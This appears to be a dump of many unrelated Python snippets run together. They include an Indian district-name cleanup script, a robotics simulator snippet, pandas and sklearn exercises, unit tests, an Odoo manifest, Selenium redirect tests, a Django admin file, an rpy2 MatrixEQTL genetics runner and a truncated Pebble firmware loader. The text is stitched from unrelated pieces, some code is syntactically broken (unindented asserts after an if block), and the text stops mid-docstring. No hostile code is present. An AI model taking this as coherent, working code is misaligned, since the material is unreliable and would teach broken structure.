    elif(key.startswith("rae_bareilly")):
        data["rae bareli/"+sub[1]] = data.pop(key)
    elif(key.startswith("ri-bhoi")):
        data['ribhoi/'+sub[1]] = data.pop(key)
    elif(key.startswith("sabar")):
        data["sabarkantha/"+sub[1]] = data.pop(key)
    elif(key.startswith("sait")):
        data["sant kabir nagar/"+sub[1]] = data.pop(key)
    elif(key.startswith("sant_ravidas")):
        data["bhadohi/"+sub[1]] = data.pop(key)
    elif(key.startswith("sepahijala")):
        data["sipahijala/"+sub[1]] = data.pop(key)
    elif(key.startswith("seraikela_kharsawan")):
        data["saraikela-kharsawan/"+sub[1]] = data.pop(key)
    elif(key.startswith("shaheed_bhagat")):
        data["shahid bhagat singh nagar/"+sub[1]] = data.pop(key)
    elif(key.startswith("siddharth")):
        data["siddharthnagar/"+sub[1]] = data.pop(key)
    elif(key.startswith("sri_ganganagar")):
        data["ganganagar/"+sub[1]] = data.pop(key)
    elif(key.startswith("sri_potti_sriramulu_nellore")):
        data["s.p.s. nellore/"+sub[1]] = data.pop(key)
    elif(key.startswith("the_dangs")):
        data["dang/"+sub[1]] = data.pop(key)
    elif(key.startswith("tirunelveli")):
        data["tirunelveli/"+sub[1]] = data.pop(key)
    elif(key.startswith("ambedkar")):
        data["ambedkar nagar/"+sub[1]] = data.pop(key)
    elif(key.startswith("ashok")):
        data["ashoknagar/"+sub[1]] = data.pop(key)
    elif(key.startswith("banas")):
        data["banaskantha/"+sub[1]] = data.pop(key)
    elif(key.startswith("bangalore_rural")):
        data["bengaluru rural/"+sub[1]] = data.pop(key)
    elif(key.startswith("bangalore_urban")):
        data["bengaluru urban/"+sub[1]] = data.pop(key)
    elif(key.startswith("devbhumi_dwaraka")):
        data["devbhumi dwarka/"+sub[1]] = data.pop(key)
    elif(key.startswith("fategarh_sahib")):
        data["fatehgarh sahib/"+sub[1]] = data.pop(key)
    elif(key.startswith("jyotiba")):
        data["amroha/"+sub[1]] = data.pop(key)
    elif(key.startswith("kaimur")):
        data["kaimur/"+sub[1]] = data.pop(key)
    elif(key.startswith('sahibzada_ajit_singh_nagar')):
        data["s.a.s. nagar/"+sub[1]] = data.pop(key)
    elif("-" in key):
        sub=key.split('-')
        data[sub[0]+' '+sub[1]] = data.pop(key)
    elif("the_" in key):
        sub = key.split("the_")
        data[sub[1]]=data.pop(key)
    elif("pashchimi" in key):
        sub=key.split('pashchimi_')
        data["west "+sub[1]] = data.pop(key)
    elif("pashchim" in key):
        sub=key.split('pashchim_')
        data["west "+sub[1]] = data.pop(key)
    elif("purba" in key and "medinipur" not in key and 'bardhaman' not in key):
        sub=key.split('purba_')
        data["east "+sub[1]] = data.pop(key)
    elif("purbi" in key):
        sub=key.split('purbi_')
        data["east "+sub[1]] = data.pop(key)
    elif("_" in key):
        sub = key.split("_", -1)
        if(len(sub)==2):
            data[sub[0]+" "+sub[1]] = data.pop(key)
        elif(len(sub)==3):
            data[sub[0]+" "+sub[1]+" "+sub[2]] = data.pop(key)
        elif(len(sub)==4):
            data[sub[0]+" "+sub[1]+" "+sub[2]+" "+sub[3]] = data.pop(key)
    # one-off key spelling fixes (mirror of the value-side table above).
    sub = key.split("/")
    if(key.startswith("anugul")):
        data["angul/"+sub[1]] = data.pop(key)
    elif(key.startswith('badgam')):
        data["budgam/"+sub[1]] = data.pop(key)
    elif(key.startswith("aizwal")):
        data["aizawl/"+sub[1]] = data.pop(key)
    elif(key.startswith("baramula")):
        data["baramulla/"+sub[1]] = data.pop(key)
    elif(key.startswith("baudh")):
        data["boudh/"+sub[1]] = data.pop(key)
    elif(key.startswith("bellary")):
        data["ballari/"+sub[1]] = data.pop(key)
    elif(key.startswith("chamarajanagar")):
        data["chamarajanagara/"+sub[1]] = data.pop(key)
    elif(key.startswith("dantewada")):
        data["dakshin bastar dantewada/"+sub[1]] = data.pop(key)
    elif(key.startswith("dhaulpur")):
        data["dholpur/"+sub[1]] = data.pop(key)
    elif(key.startswith("firozpur")):
        data["ferozepur/"+sub[1]] = data.pop(key)
    elif(key.startswith("gondiya")):
        data["gondia/"+sub[1]] = data.pop(key)
    elif(key.startswith("jagatsinghapur")):
        data["jagatsinghpur/"+sub[1]] = data.pop(key)
    elif(key.startswith("jajapur")):
        data["jajpur/"+sub[1]] = data.pop(key)
    elif(key.startswith("jalor")):
        data["jalore/"+sub[1]] = data.pop(key)
    elif(key.startswith("kanchipuram")):
        data["kancheepuram/"+sub[1]] = data.pop(key)
    elif(key.startswith("kheri")):
        data["lakhimpur kheri/"+sub[1]] = data.pop(key)
    elif(key.startswith("kochbihar")):
        data["cooch behar/"+sub[1]] = data.pop(key)
    elif(key.startswith("kodarma")):
        data["koderma/"+sub[1]] = data.pop(key)
    elif(key.startswith("mahrajganj")):
        data["maharajganj/"+sub[1]] = data.pop(key)
    elif(key.startswith("maldah")):
        data["malda/"+sub[1]] = data.pop(key)
    elif(key.startswith("marigaon")):
        data["morigaon/"+sub[1]] = data.pop(key)
    elif(key.startswith("muktsar")):
        data["sri muktsar sahib/"+sub[1]] = data.pop(key)
    elif(key.startswith("nandubar")):
        data["nandurbar/"+sub[1]] = data.pop(key)
    elif(key.startswith("narsimhapur")):
        data["narsinghpur/"+sub[1]] = data.pop(key)
    elif(key.startswith("pakaur")):
        data["pakur/"+sub[1]] = data.pop(key)
    elif(key.startswith("palghat")):
        data["palakkad/"+sub[1]] = data.pop(key)
    elif(key.startswith("pattanamtitta")):
        data["pathanamthitta/"+sub[1]] = data.pop(key)
    elif(key.startswith("puruliya")):
        data["purulia/"+sub[1]] = data.pop(key)
    elif(key.startswith("rajauri")):
        data["rajouri/"+sub[1]] = data.pop(key)
    elif(key.startswith("rangareddy")):
        data["ranga reddy/"+sub[1]] = data.pop(key)
    elif(key.startswith("sharawasti")):
        data["shrawasti/"+sub[1]] = data.pop(key)
    elif(key.startswith("shimoga")):
        data["shivamogga/"+sub[1]] = data.pop(key)
    elif(key.startswith("shopian")):
        data["shopiyan/"+sub[1]] = data.pop(key)
    elif(key.startswith("sivagangai")):
        data["sivaganga/"+sub[1]] = data.pop(key)
    elif(key.startswith("thoothukudi")):
        data["thoothukkudi/"+sub[1]] = data.pop(key)
    elif(key.startswith("tiruchchirappalli")):
        data["tiruchirappalli/"+sub[1]] = data.pop(key)
    elif(key.startswith("tiruvanamalai")):
        data["tiruvannamalai/"+sub[1]] = data.pop(key)
    elif(key.startswith("tumkur")):
        data["tumakuru/"+sub[1]] = data.pop(key)
    elif(key.startswith("yadagiri")):
        data["yadgir/"+sub[1]] = data.pop(key)
    elif(key.startswith("ysr")):
        data["y.s.r. kadapa/"+sub[1]] = data.pop(key)
    elif(key.startswith("baleshwar")):
        data["balasore/"+sub[1]] = data.pop(key)
    elif(key.startswith("belgaum")):
        data["belagavi/"+sub[1]] = data.pop(key)
    elif(key.startswith("debagarh")):
        data["deogarh/"+sub[1]] = data.pop(key)
    elif(key.startswith("faizabad")):
        data["ayodhya/"+sub[1]] = data.pop(key)
    elif(key=="bid/Q814037"):
        data["beed/"+sub[1]] = data.pop(key)
    elif(key.startswith("hugli")):
        data["hooghly/"+sub[1]] = data.pop(key)
    elif(key.startswith("jhunjhunun")):
        data["jhunjhunu/"+sub[1]] = data.pop(key)
    elif(key.startswith("mahesana")):
        data["mehsana/"+sub[1]] = data.pop(key)
    elif(key.startswith("bemetara")):
        data["bametara/"+sub[1]] = data.pop(key)
    elif(key.startswith("kabirdham")):
        data["kabeerdham/"+sub[1]] = data.pop(key)
    elif(key.startswith("sonapur")):
        data["subarnapur/"+sub[1]] = data.pop(key)
# Drop or remap entries that do not correspond to districts present in the
# case data (administrative divisions, newly created districts, duplicates).
if('konkan division/Q6268840' in data.keys()):
    data.pop('konkan division/Q6268840',None)
if('noklak/Q48731903' in data.keys()):
    data.pop('noklak/Q48731903',None)
if("mumbai suburban/Q2085374" in data.keys()):
    # Fold Mumbai Suburban into Mumbai.
    data['mumbai/Q2341660'] = data.pop("mumbai suburban/Q2085374",None)
    # NOTE(review): this second pop is a no-op — the key was already popped.
    data.pop("mumbai suburban/Q2085374",None)
if("adilabad/Q15211" in data.keys()):
    data.pop("adilabad/Q15211",None)
if("komram bheem/Q28170184" in data.keys()):
    data.pop("komram bheem/Q28170184",None)
if("nirmal/Q28169750" in data.keys()):
    data.pop("nirmal/Q28169750",None)
if("north goa/Q108234" in data.keys()):
    data.pop("north goa/Q108234",None)
# Collapse districts of states whose case data is only state-level
# (AS, MN, GA, SK, TG) into a single 'unknown_<state>' node, on both the
# key side and inside every neighbour list.
data2 = data.copy()  # iterate a copy: keys are popped from `data` below
for key,value in data2.items():
    sub = key.split("/")
    # NOTE(review): each matching district OVERWRITES data['unknown_xx']
    # with its own list (assignment, not merge) — the neighbour lists of
    # earlier districts of the same state are lost here; confirm intended.
    if(sub[0] in assam_districts['d']):
        data['unknown_'+assam_districts['c']] = data.pop(key,None)
    elif(sub[0] in manipur_districts['d']):
        data['unknown_'+manipur_districts['c']] = data.pop(key,None)
    elif(sub[0] in goa_districts['d']):
        data['unknown_'+goa_districts['c']] = data.pop(key,None)
    elif(sub[0] in sikkim_districts['d']):
        data['unknown_'+sikkim_districts['c']] = data.pop(key,None)
    elif(sub[0] in telangana_districts['d']):
        data['unknown_'+telangana_districts['c']] = data.pop(key,None)
    # Remove nodes deleted above from this entry's neighbour list.
    if('noklak/Q48731903' in value):
        value = list(filter(lambda x: x!= 'noklak/Q48731903' , value))
        data[key] = value
    if('konkan division/Q6268840' in value):
        value = list(filter(lambda x: x!= 'konkan division/Q6268840' , value))
        data[key] = value
    if('mumbai suburban/Q2085374' in value):
        value = list(filter(lambda x: x!= 'mumbai suburban/Q2085374' , value))
        data[key] = value
    if('adilabad/Q15211' in value):
        value = list(filter(lambda x: x!= 'adilabad/Q15211' , value))
        data[key] = value
    # Merge neighbours that belong to a state-level state into the
    # corresponding unknown_<state> bucket's neighbour list.
    for x in value:
        sub1 = x.split("/")
        if(sub1[0] in assam_districts['d']):
            value = list(filter(lambda x1: x1!= x , value))
            if('unknown_'+assam_districts['c'] not in data.keys()):
                data['unknown_'+assam_districts['c']] = value
            else:
                data['unknown_'+assam_districts['c']]+=value
        elif(sub1[0] in manipur_districts['d']):
            value = list(filter(lambda x1: x1!= x , value))
            if('unknown_'+manipur_districts['c'] not in data.keys()):
                data['unknown_'+manipur_districts['c']] = value
            else:
                data['unknown_'+manipur_districts['c']]+=value
        elif(sub1[0] in goa_districts['d']):
            value = list(filter(lambda x1: x1!= x , value))
            if('unknown_'+goa_districts['c'] not in data.keys()):
                data['unknown_'+goa_districts['c']] = value
            else:
                data['unknown_'+goa_districts['c']]+=value
        elif(sub1[0] in sikkim_districts['d']):
            value = list(filter(lambda x1: x1!= x , value))
            if('unknown_'+sikkim_districts['c'] not in data.keys()):
                data['unknown_'+sikkim_districts['c']] = value
            else:
                data['unknown_'+sikkim_districts['c']]+=value
        elif(sub1[0] in telangana_districts['d']):
            value = list(filter(lambda x1: x1!= x , value))
            if('unknown_'+telangana_districts['c'] not in data.keys()):
                data['unknown_'+telangana_districts['c']] = value
            else:
                data['unknown_'+telangana_districts['c']]+=value
# Rewrite any remaining state-level district references in neighbour lists
# to the unknown_<state> placeholder, drop self-references, and de-duplicate.
for key, value in data.items():
    for x in range(len(value)):
        sub = value[x].split("/")
        if(sub[0] in assam_districts['d']):
            value[x] = value[x].replace(value[x],'unknown_'+assam_districts['c'])
        elif(sub[0] in sikkim_districts['d']):
            value[x] = value[x].replace(value[x],'unknown_'+sikkim_districts['c'])
        elif(sub[0] in goa_districts['d']):
            value[x] = value[x].replace(value[x],'unknown_'+goa_districts['c'])
        elif(sub[0] in manipur_districts['d']):
            value[x] = value[x].replace(value[x],'unknown_'+manipur_districts['c'])
        elif(sub[0] in telangana_districts['d']):
            value[x] = value[x].replace(value[x],'unknown_'+telangana_districts['c'])
    if(key in value):
        value = list(filter(lambda x: x!= key, value)) #remove occurrence of key in value (eg. Delhi)
        data[key] = value
    if(len(value) == len(set(value))):
        data[key] = value
    else:
        # NOTE(review): list(set(...)) removes duplicates but the resulting
        # order is arbitrary; only the keys are sorted when dumped later.
        data[key] = list(set(value))
# Make the unknown_* adjacency symmetric: if a district lists an unknown_*
# node as a neighbour, append the district to that node's neighbour list.
for key, value in data.items():
    for x in range(len(value)):
        if(value[x]== "unknown_sk"):
            data['unknown_sk'].append(key)
        if(value[x] == "unknown_mn"):
            data['unknown_mn'].append(key)
        if(value[x] == "unknown_tg"):
            data['unknown_tg'].append(key)
# Write the cleaned adjacency map with keys sorted alphabetically.
with open("neighbor-districts-modified.json", "w") as outfile:
    json.dump(data, outfile, indent = 2, sort_keys=True)
outfile.close()  # NOTE(review): redundant — the with-block already closed it
# Reload the file on purpose: json.load preserves the on-disk (sorted) key
# order, so the ids below are assigned alphabetically starting at 101.
f=open("neighbor-districts-modified.json")
data = json.load(f)
f.close()
i=101
for key, value in data.items():
    data[key] = {'id':i, 'neighbors': value}
    i+=1
with open("neighbor-districts-modified.json", "w") as outfile:
    json.dump(data, outfile, indent = 2, sort_keys=True)
outfile.close()  # NOTE(review): redundant — the with-block already closed it
# airport quarantine
# bsf camp
# capf personnel
# chengalpattu
# evacuees
# foreign evacuees
# gaurela pendra marwahi
# hnahthial
# italians
# khawzawl
# lakshadweep
# mirpur
# muzaffarabad
# nicobars
# north and middle andaman
# other region
# other state
# others
# railway quarantine
# ranipet
# saitual
# south andaman
# tenkasi
# tirupathur
# unassigned
# unknown
# yanam
#Common Names (same district name in multiple states):
# hamirpur   -> UP, HP
# pratapgarh -> UP, RJ
# balrampur  -> UP, CT
# aurangabad -> MH, BR
# bilaspur   -> CT, HP
from cnoid.Base import *
from cnoid.BodyPlugin import *
# Look up the SR1 robot body and the floor's root link from Choreonoid's
# item tree, then register collision handling for both ankle/floor pairs.
sr1 = Item.find("SR1").body()
floorLink = Item.find("Floor").body().rootLink()
simulator = Item.find("AISTSimulator")
# presumably the id of the simulator's currently active collision handler;
# reused for both pairs below — TODO confirm against the Choreonoid API.
handler = simulator.collisionHandlerId()
simulator.setCollisionHandler(sr1.link("LLEG_ANKLE_R"), floorLink, handler)
simulator.setCollisionHandler(sr1.link("RLEG_ANKLE_R"), floorLink, handler)
|
# sklearn.preprocessing.Imputer was deprecated in scikit-learn 0.20 and
# removed in 0.22; SimpleImputer is the replacement. It imputes column-wise
# by default, which matches the old axis=0 behaviour.
from sklearn.impute import SimpleImputer
# Treat literal zeros as missing values and replace them with the column mean.
impute = SimpleImputer(missing_values=0, strategy='mean')
impute.fit_transform(X_train)
import pandas
import wget
#wget.download("https://kodim.cz/czechitas/progr2-python/python-pro-data-1/zakladni-dotazy/assets/staty.json")
# Load the country table and index it by country name.
staty = pandas.read_json("staty.json")
staty = staty.set_index("name")
#print(staty.info())
#print(staty.loc["Czech Republic":"Dominican Republic"])
#print(staty.loc["Uzbekistan":])
#print(staty.loc[["Czech Republic", "Slovakia"], "capital"])
#print(staty["population"])
#print(staty[["population", "area"]])
#populace = staty["population"]
#print(populace.sum())
#print(staty["population"] < 1000) # prints False/True per row, does not list the states
#pidistaty = staty[staty["population"] < 1000]
#print(pidistaty[["area", "population"]])
# European countries with more than 20 million inhabitants.
lidnate_evropske_staty = staty[(staty["population"] > 20_000_000) & (staty["region"] == "Europe")]
#print(lidnate_evropske_staty["population"])
# "Significant" countries: over a billion people OR over 3M km^2 of area.
vyznamne_staty = staty[(staty["population"] > 1_000_000_000) | (staty["area"] > 3_000_000)]
#print(vyznamne_staty[["population", "area"]])
# Countries in Western or Eastern Europe.
zap_vych_evropa = staty[staty["subregion"].isin(["Western Europe", "Eastern Europe"])]
print(zap_vych_evropa)
from unittest import TestCase, main
def soma(a, b):
    """Return the sum of *a* and *b*."""
    result = a + b
    return result
class Testes(TestCase):
    """Unit tests for soma()."""
    def test_soma01(self):
        # 2 + 2 must equal 4.
        self.assertEqual(soma(2,2), 4)
if __name__ == '__main__':
    main()  # run the unittest test runner when executed as a script
|
def checkio(number):
    """Return the product of the non-zero digits of *number*.

    A number with no non-zero digits would yield 1 (the empty product).
    """
    product = 1
    for digit in str(number):
        if digit != "0":
            product *= int(digit)
    return product
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
assert checkio(123405) == 120
assert checkio(999) == 729
assert checkio(1000) == 1
assert checkio(1111) == 1
|
"""
This directory holds 2 files:
currentWeather.py
pastFutureWeather.py
currentWeather.py accesses what is currently happening, uses owm.weather_manager() and a city ID
pastFutureWeather.py accesses yesterday's and the next 7 days' weather using owm.one_call() and Latitude and Longitude
""" |
# -*- coding: utf-8 -*-
# Odoo module manifest for "aikchin_modifier_access_right": declares the
# addon's metadata, module dependencies, and data/security files to load.
{
    'name': "aikchin_modifier_access_right",
    'summary': """
        Aik Chin Access Right""",
    'description': """
        Aik Chin Access Right
    """,
    'author': "Hashmicro / Luc",
    'website': "http://www.hashmicro.com",
    # Categories can be used to filter modules in modules listing
    # Check https://github.com/odoo/odoo/blob/master/odoo/addons/base/module/module_data.xml
    # for the full list
    'category': 'Uncategorized',
    'version': '0.1',
    # any module necessary for this one to work correctly
    'depends': ['base','account','delivery','crm','sale','point_of_sale','hr','customer_modifier','product_pack',
                'aikchin_modifier_fields','partner_credit_limit','bi_generic_import','branch','aikchin_modifier_fields_sales',
                'employee_appraisal'
                ],
    # always loaded (XML views, security groups and ACL CSV)
    'data': [
        'security/aikchin_access_right.xml',
        'views/views.xml',
        'security/ir.model.access.csv',
        'views/point_of_sale.xml',
        'views/employee_evaluation.xml',
        'views/human_resources.xml',
        'security/access_group.xml',
        'security/access_rights_group.xml',
    ],
    # only loaded in demonstration mode
    # NOTE(review): the comment above refers to a 'demo' key that is not
    # present in this manifest -- confirm whether demo data was intended.
}
import pytest
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from pages.basePage import BasePage
from data.dataRedirects import TEST_DATA_ABPO
from data.dataRedirects import TEST_DATA_DIFFERENT_DOMAIN
import utils.global_functions as gf
@pytest.fixture
def driver():
    """Yield a Chrome WebDriver configured through the project's global
    setup helper; the browser window is closed after each test."""
    options = Options()
    gf.setup(options)
    driver = webdriver.Chrome(options=options)
    yield driver
    # NOTE(review): close() shuts only the current window; quit() would
    # also end the chromedriver session -- confirm which is intended.
    driver.close()


@pytest.mark.parametrize('test_url,redirect_url', TEST_DATA_ABPO)
def test_redirects_abpo_domain(driver, test_url, redirect_url):
    """Each path must redirect to the expected path on the same
    landing-page domain."""
    base_page = BasePage(driver)
    base_page.go_to_url(base_page.get_landing_page_url() + test_url)
    assert base_page.get_current_url() == base_page.get_landing_page_url() + redirect_url


@pytest.mark.parametrize('test_url,redirect_url', TEST_DATA_DIFFERENT_DOMAIN)
def test_redirects_different_domain(driver, test_url, redirect_url):
    """Paths that redirect off-domain must land on the exact external URL."""
    base_page = BasePage(driver)
    base_page.go_to_url(base_page.get_landing_page_url() + test_url)
    assert base_page.get_current_url() == redirect_url
|
# Copy a file character by character.
# (The original header comment said "reverse string", but the code copies
# the file unchanged -- TODO confirm the intended behaviour.)
def all():
    """Prompt for a file name, write sample text into it, then copy the
    file's contents into a sibling file named <stem>_copy<ext>.

    Fixes over the original: the source file is closed and reopened for
    reading (it was read from a 'w'-mode handle), the nonexistent
    ``rread`` method is replaced by ``read``, and EOF is detected on the
    character actually read (the original tested the destination handle).
    """
    name = input('输入文件名字')
    # Write the sample payload and close so it is flushed before reading.
    src = open(name, 'w')
    src.write('123abcdefg')
    src.close()
    # NOTE(review): rfind('.') returns -1 for extension-less names, which
    # yields an odd copy name -- behaviour kept from the original.
    con = name.rfind('.')
    src = open(name, 'r')
    dst = open(name[0:con] + '_copy' + name[con:], 'w')

    def r_string():
        # Copy one character per call; recursion stops at end of file.
        book = src.read(1)
        if book == '':
            return ''
        dst.write(book)
        return r_string()

    r_string()
    src.close()
    dst.close()


all()
|
# Register the app's models with the Django admin site so they can be
# created and edited through the built-in admin interface.
from django.contrib import admin
from .models import Article, Location
admin.site.register(Article)
admin.site.register(Location)
|
#!/usr/bin/env python3
"""Runs the ReQTL analysis using MatrixEQTL
Created on Aug, 29 2020
@author: Nawaf Alomran
This module is based off the sample code from Shabalin, et al (2012) which is
an R package "designed for fast eQTL analysis on large datasets that test for
association between genotype and gene expression using linear regression
including ANOVA genotype effects". For more information about the package,
please consider visiting the package's page at:
http://www.bios.unc.edu/research/genomic_software/Matrix_eQTL/
|--------------|
|Important Note|
|--------------|
Due to the lack of an equivalent python library to R package "MatrixEQTL" and
to my knowledge I believe that one good alternative to overcome this is by
using rpy2 library to interface with R codes, objects or even packages within
Python. It is noteworthy to cite the documentation of the rpy2 library that
rpy2 is "more efficient, better integrated with Python" than using subprocess.
More information is found in:
https://rpy2.github.io/doc/latest/html/introduction.html
Inputs + Options
-----------------
+ -s: the SNV or variant matrix file created from harmonize_matrices
+ -sl: the SNV location matrix file created from build_VAF_matrix
+ -ge: the gene expression matrix file created from build_gene-exp_matrix
+ -gl: the gene locations file created from build_gene-exp_matrix
+ -c: the covariates matrix file created from "harmonize_matrices".
[OPTIONAL]! you can also get the file under data if you wish
+ -o: the prefix for the path to the output files
+ -ct: logical (T or F) specifying whether to split the output into cis
or trans
+ -pcis: p-value thresholds for the cis output files
+ -ptra: p-value thresholds for the trans output files
+ -p: p-value thresholds for the unified output file
Output
-------
+ one output could be cis ReQTLs and trans ReQTLs or one with all of the
unified ReQTLs. This depends on what you choose for the value of parameter
"-ct"
+ one QQ plot of p-values
How to Run
----------
# execute it by splitting cis and trans
python -m PyReQTL.run_matrix_ReQTL \
-s output/ReQTL_test_VAF_matrix_harmonized.txt \
-sl output/ReQTL_test_VAF_loc_matrix.txt \
-ge output/ReQTL_test_gene-exp_matrix_harmonized.txt \
-gl output/ReQTL_test_gene-exp-loc_matrix.txt \
-c output/covariates_matrix_harmonized.txt \
-ct T \
-o "ReQTL_test" \
-pcis 0.001 \
-ptra 0.00001 \
-cli True
# execute by unified cis and trans
python -m PyReQTL.run_matrix_ReQTL \
-s output/ReQTL_test_VAF_matrix_harmonized.txt \
-sl output/ReQTL_test_VAF_loc_matrix.txt \
-ge output/ReQTL_test_gene-exp_matrix_harmonized.txt \
-gl output/ReQTL_test_gene-exp-loc_matrix.txt \
-c output/covariates_matrix_harmonized.txt \
-ct F \
-o "ReQTL_test" \
-p 0.001 \
-cli True
* Python runtime (T) with time 2.41s user 0.36s system 146% cpu 1.890 total
* R time command line 2.09s user 0.22s system 85% cpu 2.695 total
* Python runtime of (F) via time 2.24s user 0.37s system 151% cpu 1.730 total
* R time command line 1.70s user 0.18s system 88% cpu 2.131 total
"""
import argparse
import sys
from datetime import datetime
import rpy2.robjects as robjects # type: ignore
import rpy2.robjects as ro
from rpy2.robjects.packages import importr # type: ignore
try:
from common import (create_output_dir, output_filename_generator,
bool_conv_args)
except ModuleNotFoundError:
from PyReQTL.common import (create_output_dir, output_filename_generator,
bool_conv_args)
# use the following R operators to get and set R attributes
get_r_attribute = ro.baseenv['$']
set_r_attribute = ro.baseenv['$<-']
class MapTOS4(ro.methods.RS4):
    """Map the R S4 SlicedData class into Python by extending rpy2's RS4.

    Provides pythonic access to the fields (fileSliceSize) and methods
    (LoadFile) of a MatrixEQTL SlicedData object.
    """

    def __init__(self, r_obj, file_slice_size=2000):
        super().__init__(r_obj)
        # Assigning the property immediately writes fileSliceSize on the
        # underlying R object (see the setter below).
        self.file_slice_size = file_slice_size

    def load_file(self, filename):
        """Call the R ``SlicedData$LoadFile`` method.

        Parameters
        ----------
        filename: the name of the file to load into the SlicedData object

        Return
        -------
        the result of the R LoadFile call
        """
        return get_r_attribute(self, 'LoadFile')(filename)

    @property
    def file_slice_size(self):
        """Read the ``fileSliceSize`` field of the R SlicedData object."""
        return get_r_attribute(self, 'fileSliceSize')

    @file_slice_size.setter
    def file_slice_size(self, value):
        """Set the ``fileSliceSize`` field of the R SlicedData object.

        Parameters
        ----------
        value: the value to assign to fileSliceSize
        """
        set_r_attribute(self, 'fileSliceSize', value)
def run_reqtl(args):
    """Run the ReQTL analysis via the R package MatrixEQTL (through rpy2).

    Based off the sample code from Shabalin et al. (2012).

    Parameters
    ----------
    args: parsed command-line namespace; see the module docstring for the
        meaning of every option.

    Return
    ------
    None

    Output
    ------
    - file with either cis and trans ReQTLs, or with all unified ReQTLs,
      depending on args.ct
    - a QQ plot of p-values (TIFF)
    """
    # check for installed package or install it, installing MatrixEQTL
    r_str_download = """
    testPkg <- function(x){
      if (!require(x,character.only = TRUE))
      {
        install.packages("MatrixEQTL",dep=TRUE)
        if(!require(x,character.only = TRUE)) stop("missing package!")
      }
    }
    testPkg('MatrixEQTL')
    """
    robjects.r(r_str_download)
    # R packages used downstream: utils (read.table), base (plot),
    # MatrixEQTL (the analysis itself), grDevices (tiff device).
    utils = importr("utils")
    base = importr('base')
    mql = importr("MatrixEQTL")
    gr_devices = importr('grDevices')
    start_time = datetime.now()

    # Load the SNV/genotype matrix into a SlicedData object.
    snv_filename = args.snv
    snvs_data = MapTOS4(mql.SlicedData())
    snvs_data.load_file(snv_filename)

    # Load the gene expression matrix into a SlicedData object.
    gene_express_filename = args.gen_exp
    gene_exp_data = MapTOS4(mql.SlicedData(), file_slice_size=2000)
    gene_exp_data.load_file(gene_express_filename)

    # Load the (optional) covariates matrix. FIX: the original parsed -c
    # but never loaded the file, so covariates were silently ignored.
    covar_data = MapTOS4(mql.SlicedData(), file_slice_size=1000)
    if args.cov_mt:
        covar_data.load_file(args.cov_mt)

    # SNV and gene location tables are plain data frames for MatrixEQTL.
    snv_loc_filename = args.snv_loc
    snv_pos = utils.read_table(snv_loc_filename, header=True,
                               stringsAsFactors=False)
    gene_loc_filename = args.gen_loc
    gene_pos = utils.read_table(gene_loc_filename, header=True,
                                stringsAsFactors=False)

    # "T" -> split output into cis and trans; anything else -> unified.
    cis_or_trans = args.ct
    output = create_output_dir("output")
    output_trans_file = output_filename_generator(output,
                                                  args.out_dir,
                                                  "_trans_ReQTLs.txt")
    output_cis_file = output_filename_generator(output,
                                                args.out_dir,
                                                "_cis_ReQTLs.txt")
    output_file_name = output_filename_generator(output,
                                                 args.out_dir,
                                                 "_all_ReQTLs.txt")
    # NOTE(review): useModel=117348 is presumably the integer encoding of
    # MatrixEQTL's modelLINEAR constant -- confirm against the package.
    if cis_or_trans == "T":
        mat_eqtl = mql.Matrix_eQTL_main(
            snps=snvs_data,
            gene=gene_exp_data,
            cvrt=covar_data,
            output_file_name=output_trans_file,
            pvOutputThreshold=float(args.ptra),
            useModel=117348,
            verbose=False,
            output_file_name_cis=output_cis_file,
            pvOutputThreshold_cis=float(args.pcis),
            snpspos=snv_pos,
            genepos=gene_pos,
            cisDist=1e6,
            pvalue_hist="qqplot",
            min_pv_by_genesnp=False,
            noFDRsaveMemory=False
        )
    else:
        mat_eqtl = mql.Matrix_eQTL_main(
            snps=snvs_data,
            gene=gene_exp_data,
            output_file_name=output_file_name,
            useModel=117348,
            verbose=False,
            pvOutputThreshold=float(args.p),
            snpspos=snv_pos,
            genepos=gene_pos,
            pvalue_hist="qqplot",
            min_pv_by_genesnp=False,
            noFDRsaveMemory=False
        )

    # Render the QQ plot of p-values to a TIFF file.
    ggplot_file = output_filename_generator(output, args.out_dir,
                                            "_qqplot.tiff")
    gr_devices.tiff(filename=ggplot_file)
    base.plot(mat_eqtl)
    gr_devices.dev_off()
    if args.cli:
        print(f"Analysis took {(datetime.now() - start_time).total_seconds()}"
              f" sec")
def main() -> None:
    """Parse the command-line arguments and launch the ReQTL analysis.

    Returns
    -------
    None
    """
    USAGE = """Runs the ReQTL analysis using MatrixEQTL package"""
    parser = argparse.ArgumentParser(description=USAGE)
    parser.add_argument('-s',
                        required=True,
                        dest='snv',
                        help="the SNV or variant matrix file from "
                             "harmonize_matrices")
    parser.add_argument('-sl',
                        required=True,
                        dest='snv_loc',
                        help="the SNV location matrix file from build_"
                             "VAF_matrix")
    parser.add_argument('-ge',
                        required=True,
                        dest="gen_exp",
                        help="gene expression file matrix from "
                             "build_gene-exp_matrix")
    parser.add_argument('-gl',
                        required=True,
                        dest="gen_loc",
                        help="gene locations file from build_gene-exp_matrix")
    parser.add_argument('-c',
                        dest="cov_mt",
                        help="""the covariates matrix file from "
                        "harmonize_matrices. [OPTIONAL]!""")
    parser.add_argument('-o',
                        dest="out_dir",
                        required=True,
                        help="the prefix for the path to the output files")
    parser.add_argument('-ct',
                        required=True,
                        help="logical (T or F) specifying whether to split "
                             "the output into cis or trans")
    parser.add_argument('-pcis',
                        help="p-value thresholds for the cis output files")
    # FIX: the original help text wrongly said "cis" for this option.
    parser.add_argument('-ptra',
                        help="p-value thresholds for the trans output files")
    parser.add_argument('-p',
                        help="p-value thresholds for the unified output file")
    parser.add_argument("-cli",
                        dest="cli",
                        default=False,
                        type=bool_conv_args,
                        help="""Whether the function is been executed with the
                        command line. Default is False!""")
    args = parser.parse_args()
    try:
        run_reqtl(args)
    except KeyboardInterrupt:
        sys.exit('\nthe user ends the program')


if __name__ == '__main__':
    main()
|
import json
from zipfile import ZipFile
from .resources import PebbleResources
class PebbleSystemResources(object):
    """Reads a Pebble firmware bundle (zip) and exposes its system
    resource pack together with a RESOURCE_ID_<name> -> file-id mapping
    derived from the bundle's manifest."""

    def __init__(self, firmware_path):
        self._firmware_path = firmware_path
        self._zipfile = ZipFile(firmware_path)
        self._manifest = json.loads(self._zipfile.read('manifest.json'))
        self._resource_data = self._zipfile.read('system_resources.pbpack')
        self.resources = PebbleResources(self._resource_data)
        self.resource_id_mapping = self.get_resource_id_mapping()

    def get_resource_id_mapping(self):
        """Build the name -> file-id mapping from the manifest.

        File ids are assigned sequentially starting at 1; a 'png-trans'
